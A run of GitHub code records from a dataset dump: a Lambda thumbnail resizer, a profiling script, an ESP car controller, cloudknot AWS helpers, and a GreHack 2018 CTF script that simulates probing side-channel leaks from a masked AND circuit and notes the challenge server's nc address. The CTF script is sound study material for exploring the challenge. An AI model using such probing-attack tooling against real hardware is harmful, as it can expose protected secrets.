\"gigwalk-partner-dev-api-server\", \"csmk_prod\": \"gigwalk-uu\"}\ns3_bucket_inverse_lookup = {v: k for k, v in s3_bucket_lookup.items()}\n\n\ndef lambda_handler(event, context):\n s3bucket = None\n s3_file_key = None\n env_key = None\n\n print(event)\n # there are 2 types of events\n # s3 events, image created on s3\n if event.get('Records'):\n s3bucket_name = event['Records'][0]['s3']['bucket']['name']\n s3_file_key = event['Records'][0]['s3']['object']['key']\n env_key = s3_bucket_inverse_lookup.get(s3bucket_name)\n # API event, creating the thumbnails on the fly\n elif event.get('queryStringParameters') and event.get('queryStringParameters').get('key') :\n env_key, s3_file_key = event['queryStringParameters']['key'].split('/', 1) \n s3bucket_name = s3_bucket_lookup.get(env_key)\n\n print(s3bucket_name, s3_file_key, env_key)\n\n # any of the required info is missing, failing with 400 response code\n if not all((s3bucket_name, s3_file_key, env_key)):\n return {\"statusCode\": 400}\n bucket = s3.Bucket(s3bucket_name)\n try:\n _resize_image(bucket, env_key, s3_file_key)\n except Exception as e:\n return {\"statusCode\": 400}\n\n return {\n \"statusCode\": 302,\n \"headers\": {\"Location\": 'http://gigwalk-thumbnails.s3-website-us-east-1.amazonaws.com/'+env_key+'/'+s3_file_key}\n # \"headers\": {\"Location\": 'https://google.com'}\n }\n\n\ndef _resize_image(orig_bucket, env_key, s3_file_key):\n print(\"resize image:\", env_key, s3_file_key)\n tmp_file = '/tmp/tmp.jpg'\n try:\n orig_bucket.download_file(s3_file_key, tmp_file)\n img = Image.open(tmp_file)\n img.thumbnail([300, 300], Image.ANTIALIAS)\n img.save(tmp_file)\n data = open(tmp_file, 'rb')\n thumbnail_bucket = s3.Bucket('gigwalk-thumbnails')\n s3_key = env_key+'/'+s3_file_key\n thumbnail_bucket.put_object(Key=s3_key, Body=data, ACL='public-read')\n except Exception as e:\n print(e)\n raise e\n","repo_name":"00derek/gigwalk_philbrows","sub_path":"image_resize/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11523777679","text":"\"\"\"\ndfs_profile.py\n\nHelper module to allow profiling of the dfs operations. 
At some point we may\nwant to use pstats to output the results to a log, but I'm anticipating that\nLookingGlass will provide the performance data we want.\n\nNotes:\n - output currently goes to the root directory and is in dfs_profile.stats\n - *.stats is gitignored\n - it uses the demo customers dataset for testing\n - max_depth > 2 is very slow (currently)\n - stats output can be viewed online with https://nejc.saje.info/pstats-viewer.html\n\"\"\"\nimport cProfile\nfrom pathlib import Path\n\nimport featuretools as ft\nimport featuretools.demo as demo\nfrom featuretools.synthesis.dfs import dfs\n\nes = demo.load_retail()\n\nall_aggs = ft.primitives.get_aggregation_primitives()\nall_trans = ft.primitives.get_transform_primitives()\n\nprofiler = cProfile.Profile(builtins=False)\nprofiler.enable()\nfeature_defs = dfs(\n entityset=es,\n target_dataframe_name=\"customers\",\n trans_primitives=all_trans,\n agg_primitives=all_aggs,\n max_depth=2,\n features_only=True,\n)\nprofiler.disable()\nprofiler.dump_stats(Path.cwd() / \"dfs_profile.stats\")\n","repo_name":"alteryx/featuretools","sub_path":"featuretools/tests/profiling/dfs_profile.py","file_name":"dfs_profile.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":6873,"dataset":"github-code","pt":"32"} +{"seq_id":"45030194497","text":"\nfrom random import randint\n\nd = 4\nf = \"A\"\nflag = bytearray()\nflag.extend(f)\nm = \"Z\"\nmask = bytearray()\nmask.extend(f)\n\ndef bytes_to_bits(bytes_array):\n bits = []\n for o in bytes_array:\n for i in range(8):\n bits.append((o >> i) & 1)\n return bits\n\ndef xor(l):\n res = 0\n for i in l:\n res ^= i\n return res\n\ndef simulate_leaks(flag, mask, probes, hook=None):\n \"\"\"\n Simulate the value on the wires probed when computing the bitwise AND\n between the flag (constant) and a constant mask. This function is\n called just after the user gives his probes.\n \"\"\"\n leaks = []\n masked_flag_bits = []\n\n print(\"flag\", flag, bytes_to_bits(flag))\n print(\"mask\", mask, bytes_to_bits(mask))\n\n for a, b in zip(bytes_to_bits(flag), bytes_to_bits(mask)):\n c, leak = secure_and(a, b, d, probes, hook)\n masked_flag_bits.append(c)\n leaks.append(leak)\n\n return leaks\n\ndef sharing(s, d):\n if s not in [0, 1]:\n raise ValueError(\"Only binary value accepted\")\n \"\"\"\n Make a sharing of `s` into `d`+1 shares such that the XOR of the `d`+1\n shares is equal to `s`.\n \"\"\"\n\n s_sharing = []\n for i in range(d):\n s_sharing.append(randint(0,1))\n s_sharing.append(xor(s_sharing)^s)\n \n return s_sharing\n\ndef secure_and(a, b, d, probes, hook=None):\n \"\"\"\n Mimic a hardware circuit \"securely\" computing `a`&`b` and return the \n result as well as the information that an attacker would have by\n probing on the wires defined in `probes`. 
The maximum number of probes\n allowed is `d`.\n \"\"\"\n if len(probes) > d:\n raise ValueError('Too many probes')\n\n leaks = {}\n\n if hook is not None:\n print(\"\\n---\")\n print(\"before sharing a: %r\" % a)\n print(\"before sharing b: %r\" % b)\n\n a = sharing(a, d)\n b = sharing(b, d)\n if hook == \"x\":\n print(\"after sharing a: %r\" % a)\n print(\"after sharing b: %r\" % b)\n else:\n if \"a\" in hook:\n print(\"a: %r\" % a)\n if \"b\" in hook:\n print(\"b: %r\" % b)\n\n # a and b leaks\n for i in range(d+1):\n wire = 'a_{}'.format(i)\n if wire in probes:\n leaks[wire] = a[i]\n wire = 'b_{}'.format(i)\n if wire in probes:\n leaks[wire] = b[i]\n \n alpha = []\n for i in range(len(a)):\n alpha.append([])\n for j in range(len(b)):\n alpha[-1].append(a[i] & b[j])\n wire = 'alpha_{},{}'.format(i, j)\n if wire in probes:\n leaks[wire] = alpha[i][j]\n if hook == \"x\" or \"p\" in hook:\n print(\"alpha: %r\" % alpha)\n\n ## d-compression algorithm\n c_sharing = []\n for i in range(d+1):\n tmp = 0\n for j in range(d+1):\n if j != d:\n x = ((j%d)+i)%(d+1)\n if hook == \"x\" or \"z\" in hook:\n print(\"c_%d,%d = tmp ^ alpha[%d][%d] = %d ^ %d = %d\" % (i, j, x, i, tmp, alpha[x][i], tmp ^ alpha[x][i]))\n tmp ^= alpha[x][i]\n else:\n x = ((j%d)+i)%(d+1)\n y = (i+1)%(d+1)\n if hook == \"x\" or \"z\" in hook:\n print(\"c_%d,%d = tmp ^ alpha[%d][%d] = %d ^ %d = %d\" % (i, j, x, y, tmp, alpha[x][y], tmp ^ alpha[x][y]))\n tmp ^= alpha[x][y]\n wire = 'c_{},{}'.format(i, j)\n if wire in probes:\n leaks[wire] = tmp\n c_sharing.append(tmp)\n if hook == \"x\" or \"s\" in hook:\n print(\"c_sharing: %r\" % c_sharing)\n \n ## Canonical decoder\n c = xor(c_sharing)\n if hook == \"x\" or \"c\" in hook:\n print(\"c: %r\" % c)\n\n if len(leaks) > len(probes):\n raise Exception(\"Something went wrong with the leaks\")\n\n return c, leaks\n\n\ndef play(flag, mask):\n import os\n\n flag = bytearray()\n flag.extend(\"Z\")\n mask = bytearray()\n mask.extend(\"B\")\n ex = [\"q\", \"exit\", \"quit\"]\n while True:\n try:\n print(\"\\n\\n=== \")\n cmd = raw_input(\"What do we do? \")\n if cmd in ex:\n break\n if cmd in [\"cls\", \"clear\", \"reset\"]:\n os.system(\"reset||cls\")\n if cmd.startswith(\"flag\"):\n flag = bytearray()\n flag.extend(cmd.split(\"flag \")[1])\n elif cmd.startswith(\"mask\"):\n mask = bytearray()\n mask.extend(cmd.split(\"mask \")[1])\n elif cmd.startswith(\"bits\"):\n print(bytes_to_bits(flag), len(bytes_to_bits(maks)))\n elif cmd.startswith(\"sharing\"):\n tmp = bytes_to_bits(flag)\n for i, a, b in zip(xrange(len(tmp)), tmp, bytes_to_bits(mask)):\n print(i, a, sharing(a, d), b, sharing(b, d))\n elif cmd.startswith(\"probe\"):\n probes = cmd.split(\"probe \")[1]\n print(simulate_leaks(flag, mask, probes))\n elif cmd.startswith(\"dbg\"):\n # x to debug all\n # z to debug c_sharing tables\n # p to debug alpha\n # a to debug a\n # b to debug b\n # s to debug c_sharing\n # c to debug c\n print(simulate_leaks(flag, mask, [\"b_4\", \"alpha_3,4\", \"c_4,3\"], cmd.split(\"dbg \")[1]))\n print(bytes_to_bits(flag))\n except KeyboardInterrupt:\n cmd = raw_input(\"\\nDo we quit? \")\n if cmd in ex + [\"y\", \"yes\"]:\n break\n except IndexError:\n print(\"Error in the cmd\")\n\n\nplay(flag, mask)\n# nc chohzatheeghahwoesus.challenge.grehack.fr 2341\n# a = a[0] ^ a[1] ^ a[2] ^ a[3] ^ a[4]\n# b = b[0] ^ b[1] ^ b[2] ^ b[3] ^ b[4]\n# flag[0] & mask[0] = c[0] = ((a[0] ^ b[0]) ^ c_sharing[0]) ^ ((a[1] ^ b[1]) ^ c_sharing[1]) ... 
^ ((a[4] ^ b[4]) ^ c_sharing[4])\n# flag[X] & mask[X] = c[X] = ((a[0] ^ b[0]) ^ c_sharing[0]) ^ ((a[1] ^ b[1]) ^ c_sharing[1]) ... ^ ((a[4] ^ b[4]) ^ c_sharing[4])","repo_name":"Synacktiv-contrib/grehack","sub_path":"2018/prequals/05_Micro-probing_attack/custom_probe.py","file_name":"custom_probe.py","file_ext":"py","file_size_in_byte":5973,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"39491845047","text":"from core import *\nfrom ESP.esp_python_client import *\nimport time\n\nESP_SERVER_IP = \"http://192.168.1.6/\" # Eslam Home\n\n\n# ESP_SERVER_IP = \"http://192.168.4.1/\" #IN case of ESP hotspot\n\n\nif __name__ == \"__main__\":\n\n time.sleep(2)\n # print(\"Connected to camera\")\n sleepTime = {\"F\": 0.3, \"R\": 0.05, \"L\": 0.05, \"S\": 0.1}\n while True:\n imgResp = urllib.request.urlopen('http://192.168.1.4:8080/shot.jpg')\n\n # Numpy to convert into a array\n imgNp = np.array(bytearray(imgResp.read()), dtype=np.uint8)\n\n #decode the array to OpenCV usable format\n frame = cv2.imdecode(imgNp, -1)\n direction = compute_direction(frame)\n print(direction)\n test_photo(frame)\n# ---------------------------------------------------------------------------- #\n #move, wait, stop\n sendMessage(ESP_SERVER_IP, direction)\n time.sleep(sleepTime.get(direction,1))\n sendMessage(ESP_SERVER_IP, \"S\")\n time.sleep(0.2)\n\n# ---------------------------------------------------------------------------- #\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cv2.destroyAllWindows()\n","repo_name":"eslam69/EAOS-Car","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"8954114920","text":"from __future__ import absolute_import, division, print_function\n\nimport boto3\nimport botocore\nimport configparser\nimport json\nimport logging\nimport os\nimport re\nimport uuid\nfrom collections import namedtuple\n\nfrom ..config import get_config_file, rlock\n\n__all__ = [\"clients\"]\n\n\ndef registered(fn):\n __all__.append(fn.__name__)\n return fn\n\n\nmod_logger = logging.getLogger(__name__)\n\n\n@registered\ndef get_ecr_repo():\n \"\"\"Get the cloudknot ECR repository\n\n First, check the cloudknot config file for the ecr-repo option.\n If that fails, check for the CLOUDKNOT_ECR_REPO environment variable.\n If that fails, use 'cloudknot'\n\n Returns\n -------\n repo : string\n Cloudknot ECR repository name\n \"\"\"\n config_file = get_config_file()\n config = configparser.ConfigParser()\n\n with rlock:\n config.read(config_file)\n\n option = 'ecr-repo'\n if config.has_section('aws') and config.has_option('aws', option):\n repo = config.get('aws', option)\n else:\n # Set `repo`, the fallback repo in case the cloudknot\n # repo environment variable is not set\n try:\n # Get the region from an environment variable\n repo = os.environ['CLOUDKNOT_ECR_REPO']\n except KeyError:\n repo = 'cloudknot'\n\n # Use set_ecr_repo to check for name availability\n # and write to config file\n set_ecr_repo(repo)\n\n return repo\n\n\n@registered\ndef set_ecr_repo(repo):\n \"\"\"Set the cloudknot ECR repo\n\n Set repo by modifying the cloudknot config file\n\n Parameters\n ----------\n repo : string\n Cloudknot ECR repo name\n \"\"\"\n # Update the config file\n config_file = get_config_file()\n config = configparser.ConfigParser()\n\n with rlock:\n config.read(config_file)\n\n if not config.has_section('aws'): # pragma: 
nocover\n config.add_section('aws')\n\n config.set('aws', 'ecr-repo', repo)\n with open(config_file, 'w') as f:\n config.write(f)\n\n try:\n # If repo exists, retrieve its info\n clients['ecr'].describe_repositories(\n repositoryNames=[repo]\n )\n except clients['ecr'].exceptions.RepositoryNotFoundException:\n # If it doesn't exists already, then create it\n clients['ecr'].create_repository(repositoryName=repo)\n\n\n@registered\ndef get_s3_params():\n \"\"\"Get the cloudknot S3 bucket and corresponding access policy\n\n For the bucket name, first check the cloudknot config file for the bucket\n option. If that fails, check for the CLOUDKNOT_S3_BUCKET environment\n variable. If that fails, use\n 'cloudknot-' + get_user().lower() + '-' + uuid4()\n\n For the policy name, first check the cloudknot config file. If that fails,\n use 'cloudknot-bucket-access-' + str(uuid.uuid4())\n\n For the region, first check the cloudknot config file. If that fails,\n use the current cloudknot region\n\n Returns\n -------\n bucket : NamedTuple\n A namedtuple with fields ['bucket', 'policy', 'policy_arn', 'sse']\n \"\"\"\n config_file = get_config_file()\n config = configparser.ConfigParser()\n\n BucketInfo = namedtuple('BucketInfo',\n ['bucket', 'policy', 'policy_arn', 'sse'])\n\n with rlock:\n config.read(config_file)\n\n option = 's3-bucket-policy'\n if config.has_section('aws') and config.has_option('aws', option):\n # Get policy name from the config file\n policy = config.get('aws', option)\n else:\n # or set policy to None to create it in the call to\n # set_s3_params()\n policy = None\n\n option = 's3-bucket'\n if config.has_section('aws') and config.has_option('aws', option):\n bucket = config.get('aws', option)\n else:\n try:\n # Get the bucket name from an environment variable\n bucket = os.environ['CLOUDKNOT_S3_BUCKET']\n except KeyError:\n # Use the fallback bucket b/c the cloudknot\n # bucket environment variable is not set\n bucket = ('cloudknot-' + get_user().lower()\n + '-' + str(uuid.uuid4()))\n\n if policy is not None:\n # In this case, the bucket name is new, but the policy is not.\n # Update the policy to reflect the new bucket name.\n update_s3_policy(policy=policy, bucket=bucket)\n\n option = 's3-sse'\n if config.has_section('aws') and config.has_option('aws', option):\n sse = config.get('aws', option)\n if sse not in ['AES256', 'aws:kms', 'None']:\n raise CloudknotInputError(\n 'The server-side encryption option \"sse\" must must be '\n 'one of [\"AES256\", \"aws:kms\", \"None\"]'\n )\n else:\n sse = None\n\n if sse == 'None':\n sse = None\n\n # Use set_s3_params to check for name availability\n # and write to config file\n set_s3_params(bucket=bucket, policy=policy, sse=sse)\n\n if policy is None:\n config.read(config_file)\n policy = config.get('aws', 's3-bucket-policy')\n\n response = clients['iam'].list_policies(Scope='Local',\n PathPrefix='/cloudknot/')\n policy_arn = list(filter(\n lambda d: d['PolicyName'] == policy,\n response.get('Policies')\n ))[0]['Arn']\n\n return BucketInfo(bucket=bucket, policy=policy,\n policy_arn=policy_arn, sse=sse)\n\n\n@registered\ndef set_s3_params(bucket, policy=None, sse=None):\n \"\"\"Set the cloudknot S3 bucket\n\n Set bucket by modifying the cloudknot config file\n\n Parameters\n ----------\n bucket : string\n Cloudknot S3 bucket name\n policy : string\n Cloudknot S3 bucket access policy name\n Default: None means that cloudknot will create a new policy\n sse : string\n S3 server side encryption method. 
If provided, must be one of\n ['AES256', 'aws:kms'].\n Default: None\n \"\"\"\n if sse is not None and sse not in ['AES256', 'aws:kms']:\n raise CloudknotInputError('The server-side encryption option \"sse\" '\n 'must be one of [\"AES256\", \"aws:kms\"]')\n\n # Update the config file\n config_file = get_config_file()\n config = configparser.ConfigParser()\n\n def test_bucket_put_get(bucket_, sse_):\n key = 'cloudnot-test-permissions-key'\n try:\n if sse_:\n clients['s3'].put_object(Bucket=bucket_, Body=b'test',\n Key=key, ServerSideEncryption=sse_)\n else:\n clients['s3'].put_object(Bucket=bucket_, Body=b'test', Key=key)\n\n clients['s3'].get_object(Bucket=bucket_, Key=key)\n except clients['s3'].exceptions.ClientError:\n raise CloudknotInputError('The requested bucket name already '\n 'exists and you do not have permission '\n 'to put or get objects in it.')\n\n try:\n clients['s3'].delete_object(Bucket=bucket_, Key=key)\n except Exception:\n pass\n\n with rlock:\n config.read(config_file)\n\n if not config.has_section('aws'): # pragma: nocover\n config.add_section('aws')\n\n config.set('aws', 's3-bucket', bucket)\n\n # Create the bucket\n try:\n if get_region() == 'us-east-1':\n clients['s3'].create_bucket(\n Bucket=bucket\n )\n else:\n clients['s3'].create_bucket(\n Bucket=bucket,\n CreateBucketConfiguration={\n 'LocationConstraint': get_region()\n }\n )\n except clients['s3'].exceptions.BucketAlreadyOwnedByYou:\n pass\n except clients['s3'].exceptions.BucketAlreadyExists:\n test_bucket_put_get(bucket, sse)\n except clients['s3'].exceptions.ClientError as e:\n # Check for Illegal Location Constraint\n error_code = e.response['Error']['Code']\n if error_code in ['IllegalLocationConstraintException',\n 'InvalidLocationConstraint']:\n response = clients['s3'].get_bucket_location(Bucket=bucket)\n location = response.get('LocationConstraint')\n try:\n if location == 'us-east-1' or location is None:\n clients['s3'].create_bucket(Bucket=bucket)\n else:\n clients['s3'].create_bucket(\n Bucket=bucket,\n CreateBucketConfiguration={\n 'LocationConstraint': location\n }\n )\n except clients['s3'].exceptions.BucketAlreadyOwnedByYou:\n pass\n except clients['s3'].exceptions.BucketAlreadyExists:\n test_bucket_put_get(bucket, sse)\n else:\n # Pass exception to user\n raise e\n\n if policy is None:\n policy = 'cloudknot-bucket-access-' + str(uuid.uuid4())\n\n try:\n # Create the policy\n s3_policy_doc = bucket_policy_document(bucket)\n\n clients['iam'].create_policy(\n PolicyName=policy,\n Path='/cloudknot/',\n PolicyDocument=json.dumps(s3_policy_doc),\n Description='Grants access to S3 bucket {0:s}'\n ''.format(bucket)\n )\n except clients['iam'].exceptions.EntityAlreadyExistsException:\n # Policy already exists, do nothing\n pass\n\n config.set('aws', 's3-bucket-policy', policy)\n config.set('aws', 's3-sse', str(sse))\n with open(config_file, 'w') as f:\n config.write(f)\n\n\ndef bucket_policy_document(bucket):\n \"\"\"Return the policy document to access an S3 bucket\n\n Parameters\n ----------\n bucket: string\n An Amazon S3 bucket name\n\n Returns\n -------\n s3_policy_doc: dict\n A dictionary containing the AWS policy document\n \"\"\"\n # Add policy statements to access to cloudknot S3 bucket\n s3_policy_doc = {\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Action\": [\"s3:ListBucket\"],\n \"Resource\": [\"arn:aws:s3:::{0:s}\".format(bucket)]\n },\n {\n \"Effect\": \"Allow\",\n \"Action\": [\"s3:PutObject\", \"s3:GetObject\"],\n \"Resource\": 
[\"arn:aws:s3:::{0:s}/*\".format(bucket)]\n },\n ]\n }\n\n return s3_policy_doc\n\n\ndef update_s3_policy(policy, bucket):\n \"\"\"Update the cloudknot S3 access policy with new bucket name\n\n Parameters\n ----------\n policy: string\n Amazon S3 bucket access policy name\n\n bucket: string\n Amazon S3 bucket name\n \"\"\"\n s3_policy_doc = bucket_policy_document(bucket)\n\n # Get the ARN of the policy\n response = clients['iam'].list_policies(\n Scope='Local',\n PathPrefix='/cloudknot/'\n )\n\n policy_dict = [p for p in response.get('Policies')\n if p['PolicyName'] == policy][0]\n\n arn = policy_dict['Arn']\n\n with rlock:\n try:\n # Update the policy\n clients['iam'].create_policy_version(\n PolicyArn=arn,\n PolicyDocument=json.dumps(s3_policy_doc),\n SetAsDefault=True\n )\n except clients['iam'].exceptions.LimitExceededException:\n # Too many policy versions. List policy versions and delete oldest\n response = clients['iam'].list_policy_versions(\n PolicyArn=arn\n )\n\n # Get non-default versions\n versions = [v for v in response.get('Versions')\n if not v['IsDefaultVersion']]\n\n # Get the oldest version and delete it\n oldest = sorted(versions, key=lambda ver: ver['CreateDate'])[0]\n clients['iam'].delete_policy_version(\n PolicyArn=arn,\n VersionId=oldest['VersionId']\n )\n\n # Update the policy not that there's room for another version\n clients['iam'].create_policy_version(\n PolicyArn=arn,\n PolicyDocument=json.dumps(s3_policy_doc),\n SetAsDefault=True\n )\n\n\n@registered\ndef get_region():\n \"\"\"Get the default AWS region\n\n First, check the cloudknot config file for the region option.\n If that fails, check for the AWS_DEFAULT_REGION environment variable.\n If that fails, use the region in the AWS (not cloudknot) config file.\n If that fails, use us-east-1.\n\n Returns\n -------\n region : string\n default AWS region\n \"\"\"\n config_file = get_config_file()\n config = configparser.ConfigParser()\n\n with rlock:\n config.read(config_file)\n\n if config.has_section('aws') and config.has_option('aws', 'region'):\n return config.get('aws', 'region')\n else:\n # Set `region`, the fallback region in case the cloudknot\n # config file has no region set\n try:\n # Get the region from an environment variable\n region = os.environ['AWS_DEFAULT_REGION']\n except KeyError:\n # Get the default region from the AWS config file\n home = os.path.expanduser('~')\n aws_config_file = os.path.join(home, '.aws', 'config')\n\n fallback_region = 'us-east-1'\n if os.path.isfile(aws_config_file):\n aws_config = configparser.ConfigParser()\n aws_config.read(aws_config_file)\n try:\n region = aws_config.get(\n 'default', 'region', fallback=fallback_region\n )\n except TypeError: # pragma: nocover\n # python 2.7 compatibility\n region = aws_config.get('default', 'region')\n region = region if region else fallback_region\n else:\n region = fallback_region\n\n if not config.has_section('aws'):\n config.add_section('aws')\n\n config.set('aws', 'region', region)\n with open(config_file, 'w') as f:\n config.write(f)\n\n return region\n\n\n@registered\ndef set_region(region='us-east-1'):\n \"\"\"Set the AWS region that cloudknot will use\n\n Set region by modifying the cloudknot config file and clients\n\n Parameters\n ----------\n region : string\n An AWS region.\n Default: 'us-east-1'\n \"\"\"\n response = clients['ec2'].describe_regions()\n region_names = [d['RegionName'] for d in response.get('Regions')]\n\n if region not in region_names:\n raise CloudknotInputError('`region` must be in 
{regions!s}'.format(\n regions=region_names\n ))\n\n config_file = get_config_file()\n config = configparser.ConfigParser()\n\n with rlock:\n config.read(config_file)\n\n if not config.has_section('aws'): # pragma: nocover\n config.add_section('aws')\n\n config.set('aws', 'region', region)\n with open(config_file, 'w') as f:\n config.write(f)\n\n # Update the boto3 clients so that the region change is reflected\n # throughout the package\n max_pool = clients['iam'].meta.config.max_pool_connections\n boto_config = botocore.config.Config(max_pool_connections=max_pool)\n session = boto3.Session(profile_name=get_profile(fallback=None))\n clients['batch'] = session.client('batch', region_name=region,\n config=boto_config)\n clients['cloudformation'] = session.client('cloudformation',\n region_name=region,\n config=boto_config)\n clients['ecr'] = session.client('ecr', region_name=region,\n config=boto_config)\n clients['ecs'] = session.client('ecs', region_name=region,\n config=boto_config)\n clients['ec2'] = session.client('ec2', region_name=region,\n config=boto_config)\n clients['iam'] = session.client('iam', region_name=region,\n config=boto_config)\n clients['sts'] = session.client('sts', region_name=region,\n config=boto_config)\n clients['s3'] = session.client('s3', region_name=region,\n config=boto_config)\n\n\n@registered\ndef list_profiles():\n \"\"\"Return a list of available AWS profile names\n\n Search the aws credentials file and the aws config file for profile names\n\n Returns\n -------\n profile_names : namedtuple\n A named tuple with fields: `profile_names`, a list of AWS profiles in\n the aws config file and the aws shared credentials file;\n `credentials_file`, a path to the aws shared credentials file;\n and `aws_config_file`, a path to the aws config file\n \"\"\"\n aws = os.path.join(os.path.expanduser('~'), '.aws')\n\n try:\n # Get aws credentials file from environment variable\n env_file = os.environ['AWS_SHARED_CREDENTIALS_FILE']\n credentials_file = os.path.abspath(env_file)\n except KeyError:\n # Fallback on default credentials file path\n credentials_file = os.path.join(aws, 'credentials')\n\n try:\n # Get aws config file from environment variable\n env_file = os.environ['AWS_CONFIG_FILE']\n aws_config_file = os.path.abspath(env_file)\n except KeyError:\n # Fallback on default aws config file path\n aws_config_file = os.path.join(aws, 'config')\n\n credentials = configparser.ConfigParser()\n credentials.read(credentials_file)\n\n aws_config = configparser.ConfigParser()\n aws_config.read(aws_config_file)\n\n profile_names = [s.split()[1] for s in aws_config.sections()\n if s.split()[0] == 'profile' and len(s.split()) == 2]\n\n profile_names += credentials.sections()\n\n # define a namedtuple for return value type\n ProfileInfo = namedtuple(\n 'ProfileInfo',\n ['profile_names', 'credentials_file', 'aws_config_file']\n )\n\n return ProfileInfo(\n profile_names=profile_names,\n credentials_file=credentials_file,\n aws_config_file=aws_config_file\n )\n\n\n@registered\ndef get_user():\n return clients['sts'].get_caller_identity().get('Arn').split('/')[-1]\n\n\n@registered\ndef get_profile(fallback='from-env'):\n \"\"\"Get the AWS profile to use\n\n First, check the cloudknot config file for the profile option.\n If that fails, check for the AWS_PROFILE environment variable.\n If that fails, return 'default' if there is a default profile in AWS config\n or credentials files. 
If that fails, return the fallback value.\n\n Parameters\n ----------\n fallback :\n The fallback value if get_profile cannot find an AWS profile.\n Default: 'from-env'\n\n Returns\n -------\n profile_name : string\n An AWS profile listed in the aws config file or aws shared\n credentials file\n \"\"\"\n config_file = get_config_file()\n config = configparser.ConfigParser()\n\n with rlock:\n config.read(config_file)\n\n if config.has_section('aws') and config.has_option('aws', 'profile'):\n return config.get('aws', 'profile')\n else:\n # Set profile from environment variable\n try:\n profile = os.environ['AWS_PROFILE']\n except KeyError:\n if 'default' in list_profiles().profile_names:\n # Set profile in cloudknot config to 'default'\n profile = 'default'\n else:\n return fallback\n\n if not config.has_section('aws'):\n config.add_section('aws')\n\n config.set('aws', 'profile', profile)\n with open(config_file, 'w') as f:\n config.write(f)\n\n return profile\n\n\n@registered\ndef set_profile(profile_name):\n \"\"\"Set the AWS profile that cloudknot will use\n\n Set profile by modifying the cloudknot config file and clients\n\n Parameters\n ----------\n profile_name : string\n An AWS profile listed in the aws config file or aws shared\n credentials file\n \"\"\"\n profile_info = list_profiles()\n\n if profile_name not in profile_info.profile_names:\n raise CloudknotInputError(\n 'The profile you specified does not exist in either the AWS '\n 'config file at {conf:s} or the AWS shared credentials file at '\n '{cred:s}.'.format(\n conf=profile_info.aws_config_file,\n cred=profile_info.credentials_file\n )\n )\n\n config_file = get_config_file()\n config = configparser.ConfigParser()\n\n with rlock:\n config.read(config_file)\n\n if not config.has_section('aws'): # pragma: nocover\n config.add_section('aws')\n\n config.set('aws', 'profile', profile_name)\n with open(config_file, 'w') as f:\n config.write(f)\n\n # Update the boto3 clients so that the profile change is reflected\n # throughout the package\n max_pool = clients['iam'].meta.config.max_pool_connections\n boto_config = botocore.config.Config(max_pool_connections=max_pool)\n session = boto3.Session(profile_name=profile_name)\n clients['batch'] = session.client('batch', region_name=get_region(),\n config=boto_config)\n clients['cloudformation'] = session.client('cloudformation',\n region_name=get_region(),\n config=boto_config)\n clients['ecr'] = session.client('ecr', region_name=get_region(),\n config=boto_config)\n clients['ecs'] = session.client('ecs', region_name=get_region(),\n config=boto_config)\n clients['ec2'] = session.client('ec2', region_name=get_region(),\n config=boto_config)\n clients['iam'] = session.client('iam', region_name=get_region(),\n config=boto_config)\n clients['sts'] = session.client('sts', region_name=get_region(),\n config=boto_config)\n clients['s3'] = session.client('s3', region_name=get_region(),\n config=boto_config)\n\n\n#: module-level dictionary of boto3 clients for IAM, EC2, Batch, ECR, ECS, S3.\nclients = {\n 'batch': boto3.Session(profile_name=get_profile(fallback=None)).client(\n 'batch', region_name=get_region()\n ),\n 'cloudformation': boto3.Session(\n profile_name=get_profile(fallback=None)\n ).client('cloudformation', region_name=get_region()),\n 'ecr': boto3.Session(profile_name=get_profile(fallback=None)).client(\n 'ecr', region_name=get_region()\n ),\n 'ecs': boto3.Session(profile_name=get_profile(fallback=None)).client(\n 'ecs', region_name=get_region()\n ),\n 'ec2': 
boto3.Session(profile_name=get_profile(fallback=None)).client(\n 'ec2', region_name=get_region()\n ),\n 'iam': boto3.Session(profile_name=get_profile(fallback=None)).client(\n 'iam', region_name=get_region()\n ),\n 'sts': boto3.Session(profile_name=get_profile(fallback=None)).client(\n 'sts', region_name=get_region()\n ),\n 's3': boto3.Session(profile_name=get_profile(fallback=None)).client(\n 's3', region_name=get_region()\n ),\n}\n\"\"\"module-level dictionary of boto3 clients.\n\nStoring the boto3 clients in a module-level dictionary allows us to change\nthe region and profile and have those changes reflected globally.\n\nAdvanced users: if you want to use cloudknot and boto3 at the same time,\nyou should use these clients to ensure that you have the right profile\nand region.\n\"\"\"\n\n\n@registered\ndef refresh_clients(max_pool=10):\n \"\"\"Refresh the boto3 clients dictionary\"\"\"\n with rlock:\n config = botocore.config.Config(max_pool_connections=max_pool)\n session = boto3.Session(profile_name=get_profile(fallback=None))\n clients['iam'] = session.client('iam', region_name=get_region(),\n config=config)\n clients['ec2'] = session.client('ec2', region_name=get_region(),\n config=config)\n clients['batch'] = session.client('batch', region_name=get_region(),\n config=config)\n clients['ecr'] = session.client('ecr', region_name=get_region(),\n config=config)\n clients['ecs'] = session.client('ecs', region_name=get_region(),\n config=config)\n clients['s3'] = session.client('s3', region_name=get_region(),\n config=config)\n clients['cloudformation'] = session.client('cloudformation',\n region_name=get_region(),\n config=config)\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass ResourceExistsException(Exception):\n \"\"\"Exception indicating that the requested AWS resource already exists\"\"\"\n def __init__(self, message, resource_id):\n \"\"\"Initialize the Exception\n\n Parameters\n ----------\n message : string\n The error message to display to the user\n\n resource_id : string\n The resource ID (e.g. ARN, VPC-ID) of the requested resource\n \"\"\"\n super(ResourceExistsException, self).__init__(message)\n self.resource_id = resource_id\n\n\n# noinspection PyPropertyAccess,PyAttributeOutsideInit\n@registered\nclass ResourceDoesNotExistException(Exception):\n \"\"\"Exception indicating that the requested AWS resource does not exists\"\"\"\n def __init__(self, message, resource_id):\n \"\"\"Initialize the Exception\n\n Parameters\n ----------\n message : string\n The error message to display to the user\n\n resource_id : string\n The resource ID (e.g. ARN, VPC-ID) of the requested resource\n \"\"\"\n 